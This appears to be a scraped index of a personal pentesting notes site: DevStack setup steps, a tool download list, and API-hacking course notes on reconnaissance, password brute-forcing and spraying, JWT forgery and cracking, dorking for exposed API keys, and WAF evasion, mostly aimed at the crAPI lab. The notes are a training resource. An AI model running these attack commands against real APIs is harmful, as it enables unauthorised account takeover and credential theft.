Ensure the home directory for the stack user has executable permission for all, as RHEL-based distros create it with 700 and Ubuntu 21.04+ with 750, which can cause issues during deployment.

sudo chmod +x /opt/stack

                                  Since this user will be making many changes to your system, it should have sudo privileges:

                                  echo \"stack ALL=(ALL) NOPASSWD: ALL\" | sudo tee /etc/sudoers.d/stack\nsudo -u stack -i\n
                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#3-download-devstack","title":"3. Download DevStack","text":"
git clone https://opendev.org/openstack/devstack
cd devstack

The devstack repo contains a script that installs OpenStack and templates for configuration files.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#4-create-a-localconf","title":"4. Create a local.conf","text":"

Create a local.conf file with four passwords preset at the root of the devstack git repo.

[[local|localrc]]
ADMIN_PASSWORD=secret
DATABASE_PASSWORD=$ADMIN_PASSWORD
RABBIT_PASSWORD=$ADMIN_PASSWORD
SERVICE_PASSWORD=$ADMIN_PASSWORD

This is the minimum required config to get started with DevStack. There is a sample local.conf file under the samples directory in the devstack repository.

                                  Warning: Only use alphanumeric characters in your passwords, as some services fail to work when using special characters.

                                  ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#5-start-the-install","title":"5. Start the install","text":"
./stack.sh

                                  This will take 15 - 30 minutes, largely depending on the speed of your internet connection. Many git trees and packages will be installed during this process.
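When stack.sh finishes, you can sanity-check the deployment from the same shell; a sketch assuming the default openrc credentials file DevStack generates at the repo root:

# Load admin credentials generated by DevStack, then list registered services
source openrc admin admin
openstack service list
openstack compute service list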

                                  ","tags":["cloud","Openstack","open source"]},{"location":"files/index-of-files/","title":"Index of downloads","text":"

                                  These are some of the tools that I use when conducting penetration testing. Most of them have their own updated repositories, so the best approach for you would be to visit the official repository or download the source code. In my case, when dealing with restricted environments, there are times when I require a direct download of a previously verified and clean file. Therefore, the main goal of this list is to provide me with these resources when needed, within a matter of seconds.

                                  • Binscope: BinScope_x64.msi
                                  • Echo Mirage: EchoMirage.zip | Echo Mirage at HackingLife
                                  • Processhacker 2.39 bin: processhacker-2.39-bin.zip | Process Hacker Monitor at HackingLife.
                                  • RegistryChangesView:
                                    • RegistryChangesView (x64): registrychangesview-x64.zip
                                    • RegistryChangesView (x86): registrychangesview-x86.zip
                                  • Regshot 1.9.0: Regshot-1.9.0.zip | Regshot at HackingLife
                                  • Visual Studio Code - Community downloader: vs_community__bb594837aa124b4d8487a41015a6017a.exe
                                  ","tags":["resources"]},{"location":"files/index-of-files/#reporting","title":"Reporting","text":"

                                  https://pentestreports.com/

                                  ","tags":["resources"]},{"location":"hackingapis/","title":"Hacking APIs","text":"","tags":["api"]},{"location":"hackingapis/#about-the-course","title":"About the course","text":"

Notes from the course "APIsec Certified Expert", a practical course in API hacking taught by Corey J. Ball.

                                  Course: https://university.apisec.ai/

                                  Book: https://www.amazon.com/Hacking-APIs-Application-Programming-Interfaces/dp/1718502443

                                  Instructor: Corey J. Ball.

                                  ","tags":["api"]},{"location":"hackingapis/#general-index-of-the-course","title":"General index of the course","text":"
                                  • Setting up the environment
                                  • Setting up the labs + Writeups
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/","title":"API authentication attacks","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#classic-authentication-attacks","title":"Classic authentication attacks","text":"

We'll consider two attacks: password brute-force attacks and password spraying. These attacks may take place whenever Basic Authentication is deployed in the context of a RESTful API.

                                  The principle of Basic authentication is that the consumer issues a request containing a username and password.

As RESTful APIs don't maintain state, the API would need to leverage basic authentication across all endpoints. Instead of doing this, the API may leverage basic authentication once against an authentication portal; upon providing the correct credentials, a token is issued to be used in subsequent requests.
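A sketch of both patterns with curl (the endpoint, credentials, and token field are hypothetical):

# Basic authentication on every request (credentials sent each time)
curl -u alice:Passw0rd! https://api.example.com/widgets

# Authenticate once, then reuse the issued token on subsequent requests
TOKEN=$(curl -s -X POST https://api.example.com/login \
  -H "Content-Type: application/json" \
  -d '{"email":"alice@example.com","password":"Passw0rd!"}' | jq -r .token)
curl -H "Authorization: Bearer $TOKEN" https://api.example.com/widgets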

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-password-brute-force-attacks","title":"1. Password Brute-Force Attacks","text":"

                                  Brute-forcing an API's authentication is not very different from any other brute-force attack, except you will send the request to an API endpoint, the payload will often be in JSON, and the authentication values may be base64 encoded.

                                  Infinite ways to do it. You can use:

                                  • Intruder module of BurpSuite.
                                  • ZAP proxy tool.
                                  • wfuzz.
                                  • ffuf.
                                  • others.

                                  Let's see wfuzz:

                                  wfuzz -d {\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"PASSWORD\"} -z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. \n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n

Tools to build password lists:

• https://github.com/sc0tfree/mentalist
• CUPP - Common User Password Profiler
• crunch (already installed in Kali)

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-password-spraying","title":"2. Password Spraying","text":"

Very useful if you know the password policy of the API we are attacking. Say there is an account lockout policy after ten tries. Then you can run a password spraying attack with 9 tries, using the 9 most probable passwords against all the account emails spotted.

In crAPI we detected earlier a disclosure of information on the forum page (a JSON response with all kinds of data from users who have posted on the forum), so we can save that JSON response as response.json and filter out the users' emails:

The following grep command should pull everything out of a file that resembles an email. You can then save those captured emails to a file and use that file as a payload in Burp Suite, using a command like sort -u to get rid of duplicate emails.

grep -oe "[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+" response.json | uniq | sort -u > mailusers.txt
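With mailusers.txt in hand, wfuzz can drive the spray itself using its multiple-payload support (the top9-passwords.txt wordlist is an assumption; FUZZ and FUZ2Z mark the two injection points):

# Spray 9 likely passwords across every harvested email
wfuzz -z file,mailusers.txt -z file,top9-passwords.txt \
  -d '{"email":"FUZZ","password":"FUZ2Z"}' \
  -u http://localhost:8888/identity/api/auth/login --hc 500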
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#api-authentication-attacks_1","title":"API Authentication Attacks","text":"

To go further with authentication attacks we need to analyze API tokens and the way they are generated; when talking about token generation and analysis, one word comes up immediately: entropy.

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#entropy-analysis-burpsuite-sequencers-live-capture","title":"Entropy analysis: BurpSuite Sequencer's live capture","text":"

                                  Instructions to set up a proxy in Postman to intercept traffic with BurpSuite and have it sent to Sequencer.

                                  Once you send a POST request (in which a token is generated) to Sequencer, you need to define the custom token location in the context menu. After that you can click on \"Start Live Capture\".

                                  BurpSuite Sequencer provides two methods for token analysis:

• Manually analysing tokens provided in a text file. To perform a manual analysis, you need to provide BurpSuite Sequencer with a minimum of 100 tokens.
                                  • Performing a live capture to automatically generate tokens.

Let's focus our attention on a live capture using BurpSuite Sequencer. A live capture will provide us with 20,000 automatically generated tokens. What for?

• To produce a token analysis report that measures the entropy of the token generation process (and gives us valuable hints about how to brute-force, password spray, or bypass the authentication). For instance, if an API provider is generating tokens sequentially, then even if the token were 20-plus characters long, it could be the case that many of the characters in the token do not actually change.
• Having this large collection of 20,000 identities can help us evade security controls.

                                  The token analysis report

• The summary of the findings provides info about the quality of randomness within the token sample. The goal is to determine whether there are parts of the token that do not change and other parts that often change. Full entropy would be 100% randomness (no patterns found).
                                  • Character-level analysis provides the degree of confidence in the randomness of the sample at each character position. The significance level at each position is the probability of the observed character-level results occurring.
                                  • Bit-level analysis indicates the degree of confidence in the randomness of the sample at each bit position.
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#jwt-attacks","title":"JWT attacks","text":"

                                  Two tools: jwt.io and jwt_tools.

                                  To see a jwt decoded on your CLI:

jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug

                                  Result:

                                  Also, to see the decoded jwt, knowing that is encoded in base64, we could echo each of its parts:

echo eyJhbGciOiJIUzUxMiJ9 | base64 -d && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d

                                  Results:

                                  {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

                                  To run a JWT scan with jwt_tool, run:

jwt_tool -t <http://target-site.com/> -rh "<Header>: <JWT_Token>" -M pb
# in the target site specify a path that leverages a call to a token
# replace Header with the name of the header and JWT_Token with the actual token.
# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.

                                  Example:

                                  Some more jwt_tool flags that may come in hand:

# -X EXPLOIT, --exploit EXPLOIT
#                        eXploit known vulnerabilities:
#                        a = alg:none
#                        n = null signature
#                        b = blank password accepted in signature
#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
#                        k = key confusion (specify public key with -pk)
#                        i = inject inline JWKS
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-the-none-attack","title":"1. The none attack","text":"

                                  A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

                                  To craft a JWT with \"none\" as the value of \"alg\", run:

                                  jwt_tool <JWT_Token> -X a\n
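
                                  If jwt_tool is not at hand, an alg:none token can also be crafted manually with base64 (a minimal sketch; the claim values are placeholders, not values from a real target):

                                  header=$(echo -n '{\"alg\":\"none\",\"typ\":\"JWT\"}' | base64 | tr -d '=' | tr '/+' '_-')\n# base64url-encode a payload containing the claims you want to spoof\npayload=$(echo -n '{\"sub\":\"admin@example.com\"}' | base64 | tr -d '=' | tr '/+' '_-')\n# an alg:none token is just header.payload. with an empty signature\necho \"$header.$payload.\"\n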
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-the-null-signature-attack","title":"2. The null signature attack","text":"

                                  The second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether while leaving the last period in place.
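
                                  Per the exploit flags listed above, jwt_tool can automate the null signature test as well:

                                  jwt_tool <JWT_Token> -X n\n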

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

                                  Launching this attack is relatively simple. Just remove the password value from the payload and leave it blank. Then, regenerate the JWT.

                                  Also, with jwt_tool, run:

                                  jwt_tool <JWT_Token> -X b\n
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#3-the-algorithm-switch-or-key-confusion-attack","title":"3. The algorithm switch (or key-confusion) attack","text":"

                                  A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

                                  jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
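
                                  If you don't already have the provider's public key, one place it may be exposed is the server's TLS certificate (a sketch, assuming the API is served over HTTPS on the standard port):

                                  openssl s_client -connect target-site.com:443 </dev/null 2>/dev/null | openssl x509 -pubkey -noout > public-key.pem\n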
                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#4-the-jwt-crack-attack","title":"4. The jwt crack attack","text":"

                                  JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

                                  jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

                                  Once you crack the secret used for the signature, you can create your own trusted tokens: 1. Grab another user's email (in the crAPI app, from the data exposure vulnerability in the recent forum posts endpoint: GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.
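
                                  For step 2, jwt_tool's tamper mode can re-sign the token with the cracked secret (a sketch; the secret value is a placeholder):

                                  jwt_tool <JWT_Token> -T -S hs256 -p 'crackedsecret'\n# -T: tamper with the claims (e.g. change \"sub\" to the victim's email)\n# -S hs256 -p: re-sign the modified token with the cracked secret\n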

                                  ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#5-spoofing-jws","title":"5. Spoofing JWS","text":"

                                  Specify the JWKS URL with -ju, or set it in jwtconf.ini to automate this attack.
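
                                  Per the exploit flag list above, a sketch (the JWKS URL is a placeholder for a file you host):

                                  jwt_tool <JWT_Token> -X s -ju https://attacker.example/jwks.json\n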

                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/","title":"Api Reconnaissance","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#passive-reconnaissance","title":"Passive reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#google-dorks","title":"Google Dorks","text":"

                                  More about google dorks.

                                  Google Dorking queries and expected results:

                                  • intitle:\"api\" site: \"example.com\" - Finds all publicly available API-related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\"
                                  • intitle:\"json\" site: \"example.com\" - Many APIs use JSON, so this might be a cool filter.
                                  • inurl:\"/wp-json/wp/v2/users\" - Finds all publicly available WordPress API user directories.
                                  • intitle:\"index.of\" intext:\"api.txt\" - Finds publicly available API key files.
                                  • inurl:\"/api/v1\" intext:\"index of /\" - Finds potentially interesting API directories.
                                  • intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool - This is one of my favorite queries. It lists potentially exposed API keys.
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#github","title":"Github","text":"

                                  More GitHub Dorking.

                                  GitHub can also be a good platform to search for overshared information relating to APIs.

                                  GitHub Dorking queries and expected results:

                                  • applicationName api key - After getting results, filter by Issues and you may find some API keys. It's common to leave API keys exposed when rebasing a git repo. Other terms to try: api_key, authorization_bearer, oauth, auth, authentication, client_secret, api_token, client_id, OTP, HOMEBREW_GITHUB_API_TOKEN, SF_USERNAME, HEROKU_API_KEY, JEKYLL_GITHUB_TOKEN, api.forecast.io, password, user_password, user_pass, passcode, client_secret, secret, password hash, user auth.
                                  • extension: json nasa - Results show some extensions that include JSON, so they might be API related.
                                  • shodan_api_key - Results show Shodan API keys.
                                  • \"authorization: Bearer\" - This search reveals some authorization tokens.
                                  • filename: swagger.json - Go to the Code tab and you will find the Swagger file.
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#shodan","title":"Shodan","text":"Shodan Dorking queries and expected results:

                                  • \"content-type: application/json\" - This type of content is usually related to APIs.
                                  • \"wp-json\" - Useful if the target is using WordPress.
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#waybackmachine","title":"WaybackMachine","text":"WaybackMachine Dorking query and expected results:

                                  • Path to an API - We are trying to see if there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly do not anymore.
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#active-reconnaissance","title":"Active reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#nmap","title":"nmap","text":"

                                  Nmap Cheat sheet.

                                  First, we do a service enumeration. The Nmap general detection scan uses default scripts (-sC) and service enumeration (-sV) against a target and then saves the output in three formats for later review (-oX for XML, -oN for Nmap, -oG for greppable, or -oA for all three):

                                  nmap -sC -sV [target address or network range] -oA nameofoutput\n

                                  The Nmap all-port scan will quickly check all 65,535 TCP ports for running services, application versions, and host operating system in use:

                                  nmap -p- [target address] -oA allportscan\n

                                  You\u2019ll most likely discover APIs by looking at the results related to HTTP traffic and other indications of web servers. Typically, you\u2019ll find these running on ports 80 and 443, but an API can be hosted on all sorts of different ports. Once you discover a web server, you can perform HTTP enumeration using a Nmap NSE script (use -p to specify which ports you'd like to test).

                                  nmap -sV --script=http-enum $ip -p 80,443,8000,8080\n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#amass","title":"amass","text":"

                                  amass Cheat sheet.

                                  Before diving into using Amass, we should make the most of it by adding API keys to it.

                                  1. First, we can see which data sources are available for Amass (paid and free) by running:

                                  amass enum -list \n

                                  2. Next, we will need to create a config file to add our API keys to.

                                  sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

                                  3. Now, review the file ~/.config/amass/config.ini and register with as many services as you can. Once you have obtained your API ID and secret, edit the config.ini file and add the credentials to it.

                                  sudo nano ~/.config/amass/config.ini\n

                                  4. Now, edit the file to add the sources. It is recommended to add:

                                  • censys.io: takes the guesswork out of understanding and protecting your organization\u2019s digital footprint.
                                  • https://asnlookup.com: Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data. We also offer a free and paid API access!
                                  • https://otx.alienvault.com: Quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security and many other.
                                  • https://bigdatacloud.com
                                  • https://cloudflare.com
                                  • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager
                                  • https://fullhunt.io
                                  • https://github.com
                                  • https://ipdata.co
                                  • https://leakix.net
                                  • as many more as you can.

                                  5. When ready, we can run amass:

                                  amass enum -active -d crapi.apisec.ai  \n

                                  Also, to be more precise:

                                  amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

                                  Amass has several useful command-line options. Use the intel command to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses:

                                  amass intel -addr [target IP addresses]\n

                                  If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

                                  amass intel -d [target domain] -whois\n

                                  This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

                                  amass enum -passive -d [target domain]\n

                                  The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

                                  amass enum -active -d [target domain]\n

                                  To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

                                  amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#gobuster","title":"gobuster","text":"

                                  gobuster Cheat sheet.

                                  A great tool for brute-forcing directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan), and its dictionaries are not API-specific. Here are some commands for Gobuster:

                                  gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# the -b flag excludes a specific HTTP response code from the results\n
                                  ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#kiterunner","title":"Kiterunner","text":"

                                  kiterunner Cheat sheet.

                                  Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster/Dirbuster work to discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

                                  1. First, download the dictionaries from the project. In my case I downloaded them to /usr/share/wordlists/kiterunner/:

                                  • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
                                  • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
                                  • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
                                  • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

                                  2. Run a quick scan of your target\u2019s URL or IP address like this:

                                  kr scan http://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                                  Note, however, that we conducted this scan without any authorization headers, which the target API likely requires.

                                  To use a dictionary (and not a kite file):

                                  kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                                  If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

                                  One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

                                  kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                                  Running this will replay the request and provide you with the HTTP response.

                                  To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

                                  kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/","title":"Endpoint analysis","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups

                                  If an API is not documented or the documentation is unavailable to you, then you will need to build out your own collection of requests. Two different methods:

                                  1. Build a collection in Postman
                                  2. Build out an API specification using mitmproxy2swagger.
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-a-collection-in-postman","title":"Build a collection in Postman","text":"

                                  In the instance where there is no documentation and no specification file, you will have to reverse-engineer the API based on your interactions with it. Mapping an API with several endpoints and a few methods can quickly grow into quite a large attack surface. There are two ways to manually reverse engineer an API with Postman.

                                  • One way is by constructing each request.
                                  • The other way is to proxy web traffic through Postman, then use it to capture a stream of requests. This process makes it much easier to construct requests within Postman, but you\u2019ll have to remove or ignore unrelated requests.
                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps","title":"Steps","text":"

                                  1. Start the crAPI application

                                  cd ~/lab/crapi\nsudo docker-compose start\n

                                  2. Open the browser, and select \"postman 5555\" in your Foxyproxy addon to proxy the traffic.

                                  3. Open your local crapi application in the browser: http://localhost:8888

                                  4. Run postman from the command line:

                                  postman\n

                                  5. Once postman is open, press on \"Capture traffic link\" (at the bottom right of the application). Set up the capture, and make sure that proxy is enabled in the application. A useful shortcut to go to Settings is CTRL-, (comma).

                                  6. Now you are capturing the traffic. Go through your crapi application and when done, go to postman and stop the capture.

                                  7. The final step is to filter out the requests you want and add them to a collection. In the collection, you will be able to organize these requests in folders/endpoints.

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-out-an-api-specification-using-mitmproxy2swagger","title":"Build out an API specification using mitmproxy2swagger","text":"","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#steps_1","title":"Steps","text":"

                                  1. From cli, run:

                                  mitmweb\n

                                  2. Select burp 8080 in the foxyproxy addon in your browser.

                                  3. Open a tab in your browser with the mitmweb proxy service: http://localhost:8081, and make sure that traffic is being captured there.

                                  4. Now you are capturing the traffic. Go through your crapi application and when done, turn off the foxyproxy.

                                  5. In the mitmweb service at http://localhost:8081, go to File>Save. A file called \"flows\" will be downloaded to your download folder.

                                  6. We need to parse this \"flows\" file into something understandable by Postman. For that, we will use a tool called mitmproxy2swagger, which will transform our captured traffic into an Open API 3.0 YAML file that can be viewed in a browser and imported as a collection into Postman. Run:

                                  sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow \n# -i: input    |  -o: output   | -p: target   |  -f: force format to the specified.\n

                                  7. Edit spec.yml to remove the \"ignore:\" prefix where appropriate, and save the changes.

                                  Run mitmproxy2swagger again to populate your spec with examples.

                                  sudo mitmproxy2swagger -i ~/Downloads/flows -o spec.yml -p http://localhost:8888/ -f flow --examples\n# --examples will grab the previously created spec.yml and will populate it with real examples. We do this in two steps to avoid creating examples for request out of scope.  \n

                                  8. Open https://editor.swagger.io/ and click on File > Import. Import your spec.yml. The goal here is to validate the structure of your file.

                                  9. If everything is ok, open the postman application:

                                  postman\n

                                  10. In postman, go to File > Import, and select the spec.yml file. After importing it, you will be able to add it to a collection, and compare this collection against that created by browsing just with postman.

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#data-exposure","title":"Data Exposure","text":"

                                  Quoting directly from the course: \"When making a request to an endpoint, make sure you note the request\u00a0requirements. Requirements could include some form of authentication, parameters, path variables, headers, and information included in the body of the request. The API documentation should tell you what it requires of you and mention which part of the request that information belongs in. If the documentation provides examples, use them to help you. Typically, you can replace the example values with the ones you\u2019re looking for. The table below describes some of the conventions often used in these examples\".

                                  ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#api-documentation-conventions","title":"API Documentation Conventions","text":"Convention Example Meaning : or {} /user/:id /user/{id} /user/2727 /account/:username /account/{username} /account/scuttleph1sh The colon or curly brackets are used by some APIs to indicate a path variable. In other words, \u201c:id\u201d represents the variable for an ID number and \u201c{username}\u201d represents the account username you are trying to access. [] /api/v1/user?find=[name] Square brackets indicate that the input is optional. || \u201cblue\u201d || \u201cgreen\u201d || \u201cred\u201d Double bars represent different possible values that can be used.","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/","title":"Evasion and Combining techniques","text":"General index of the course
                                  • Setting up the environment
                                  • Api Reconnaissance.
                                  • Endpoint Analysis.
                                  • Scanning APIS.
                                  • API Authorization Attacks.
                                  • Exploiting API Authorization.
                                  • Testing for Improper Assets Management.
                                  • Mass Assignment.
                                  • Server side Request Forgery.
                                  • Injection Attacks.
                                  • Evasion and Combining techniques.
                                  • Setting up the labs + Writeups
                                  Resources
                                  • w3af
                                  • WAFW00f
                                  • waf-bypass.com.
                                  • hacken.io
                                  • Awesome WAF.

                                  Here are some basic techniques for evading or bypassing common API security controls.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#what-can-trigger-a-waf-web-applicatin-firewall","title":"What can trigger a WAF (Web Applicatin Firewall)?","text":"
                                  • Too many requests for nonexistent resources.
                                  • Too many requests in a short period of time.
                                  • Common SQL or XSS payloads in requests.
                                  • Unusual behaviour (like tests for authorization vulnerabilities).
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#how-to-detect-a-waf","title":"How to detect a WAF","text":"

                                  What can a WAF do, provided that RESTful APIs are stateless? They use attribution to identify an attacker: IP address, origin headers, authorization tokens, and metadata (patterns of requests, rate of requests, and the combination of headers included in the requests).

                                  When it comes to hacking APIs, the best approach is to first use the API as it was intended. Second, review the API responses for evidence of a WAF (in headers):

                                  1. Headers such as X-CDN mean that the API is leveraging a Content Delivery Network (CDN), which often provides WAFs as a service.

                                  2. Use Burp Suite's Proxy and Repeater to see if your requests are being sent to a proxy (a 302 redirecting you to a CDN).

                                  3. Use some tools:

                                  nmap -p 80 --script http-waf-detect $ip\n

                                  Also w3af, WAFW00f, and this collection of handy tools: waf-bypass.com.

                                  A great article found when searching for these tools: hacken.io.

                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#techniques-for-evasion","title":"Techniques for evasion","text":"","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#1-burners-accounts","title":"1. Burners accounts","text":"

                                  So there is a WAF. Before attacking, create several extra accounts (or tokens you can dispose of). Watch out! When creating these accounts, make sure you use information not associated with your other accounts:

                                  - Different names and emails.\n- Different passwords.\n- Use VPN and disguise your IP.\n
                                  ","tags":["api"]},{"location":"hackingapis/evasion-combining-techniques/#2-bypassing-controls-with-string-terminators","title":"2. Bypassing controls with string terminators","text":"

                                  Simple payloads.

                                  Null bytes and other combinations of symbols are often interpreted as\u00a0string terminators. When not filtered out, they can terminate the string early and slip past the API security control filters.

